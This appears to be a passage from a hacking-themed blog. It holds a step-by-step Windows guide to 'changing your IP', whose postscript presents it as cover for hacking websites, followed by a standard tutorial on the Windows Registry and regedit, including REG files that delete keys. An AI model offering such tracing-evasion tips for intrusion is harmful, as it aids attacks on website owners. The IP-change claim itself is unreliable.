13. Try logging on with the username and password and see if it works.

How To Change Your Ip In Less Then 1 Minute


How To Change Your Ip In Less Then 1 Minute :)


1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Monday 2 January 2012

What is the Registry?



The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).

The Structure of The Registry
The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.

Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.

There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:


* HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.
* HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.
* HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.
* HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.
* HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.
* HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.



Each registry value is stored as one of five main data types:


* REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.
* REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.
* REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)
* REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)
* REG_SZ - This type is a standard string, used to represent human readable text values.



Other data types not available through the standard registry editors include:


* REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format.
* REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format.
* REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type.
* REG_NONE - No defined value type.
* REG_QWORD - A 64-bit number.
* REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format.
* REG_RESOURCE_LIST - A device-driver resource list.



Editing The Registry

The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won't find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type "regedit", and if the Registry Editor is installed it should now open and look like the image below.

An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000, it includes some additional features not found in the standard version, including; the ability to view and modify security permissions, and being able to create and modify the extended string values REG_EXPAND_SZ & REG_MULTI_SZ.

Create a Shortcut to Regedit
This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor.

Using Regedit to modify your Registry
Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.

Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.

Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry!

Importing and Exporting Registry Settings

A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below:

Quote:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02


The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary.

So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.

Deleting keys or values using a REG file
It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:

Quote:

REGEDIT4

[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]


The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:

Quote:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=-


Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.

Regedit Command Line Options
Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific.


* regedit.exe [options] [filename] [regpath]
* [filename] Import .reg file into the registry
* /s [filename] Silent import, i.e. hide confirmation box when importing files
* /e [filename] [regpath] Export the registry to [filename] starting at [regpath]
e.g. regedit /e file.reg HKEY_USERS\.DEFAULT
* /L:system Specify the location of the system.dat to use
* /R:user Specify the location of the user.dat to use
* /C [filename] Compress (Windows 98)
* /D [regpath] Delete the specified key (Windows 98)

Maintaining the Registry

How can you backup and restore the Registry?

Windows 95
Microsoft included a utility on the Windows 95 CD-ROM that lets you create backups of the Registry on your computer. The Microsoft Configuration Backup program, CFGBACK.EXE, can be found in the \Other\Misc\Cfgback directory on the Windows 95 CD-ROM. This utility lets you create up to nine different backup copies of the Registry, which it stores, with the extension RBK, in your \Windows directory. If your system is set up for multiple users, CFGBACK.EXE won't back up the USER.DAT file.

After you have backed up your Registry, you can copy the RBK file onto a floppy disk for safekeeping. However, to restore from a backup, the RBK file must reside in the \Windows directory. Windows 95 stores the backups in compressed form, which you can then restore only by using the CFGBACK.EXE utility.

Windows 98
Microsoft Windows 98 automatically creates a backup copy of the registry every time Windows starts, in addition to this you can manually create a backup using the Registry Checker utility by running SCANREGW.EXE from Start | Run menu.

What to do if you get a Corrupted Registry
Windows 95, 98 and NT all have a simple registry backup mechanism that is quite reliable, although you should never simply rely on it, remember to always make a backup first!

Windows 95
In the Windows directory there are several hidden files, four of these will be SYSTEM.DAT & USER.DAT, your current registry, and SYSTEM.DA0 & USER.DA0, a backup of your registry. Windows 9x has a nice reature in that every time it appears to start successfully it will copy the registry over these backup files, so just in case something goes wrong can can restore it to a known good state. To restore the registry follow these instruction:
[list=1]
* Click the Start button, and then click Shut Down.

* Click Restart The Computer In MS-DOS Mode, then click Yes.

* Change to your Windows directory. For example, if your Windows directory is c:\windows, you would type the following:

cd c:\windows

* Type the following commands, pressing ENTER after each one. (Note that SYSTEM.DA0 and USER.DA0 contain the number zero.)

attrib -h -r -s system.dat
attrib -h -r -s system.da0
copy system.da0 system.dat
attrib -h -r -s user.dat
attrib -h -r -s user.da0
copy user.da0 user.dat

* Restart your computer.



Following this procedure will restore your registry to its state when you last successfully started your computer.

If all else fails, there is a file on your hard disk named SYSTEM.1ST that was created when Windows 95 was first successfully installed. If necessary you could also change the file attributes of this file from read-only and hidden to archive to copy the file to C:\WINDOWS\SYSTEM.DAT.

Windows NT
On Windows NT you can use either the "Last Known Good" option or RDISK to restore to registry to a stable working configuration.

How can I clean out old data from the Registry?
Although it's possible to manually go through the Registry and delete unwanted entries, Microsoft provides a tool to automate the process, the program is called RegClean. RegClean analyzes Windows Registry keys stored in a common location in the Windows Registry. It finds keys that contain erroneous values, it removes them from the Windows Registry after having recording those entries in the Undo.Reg file.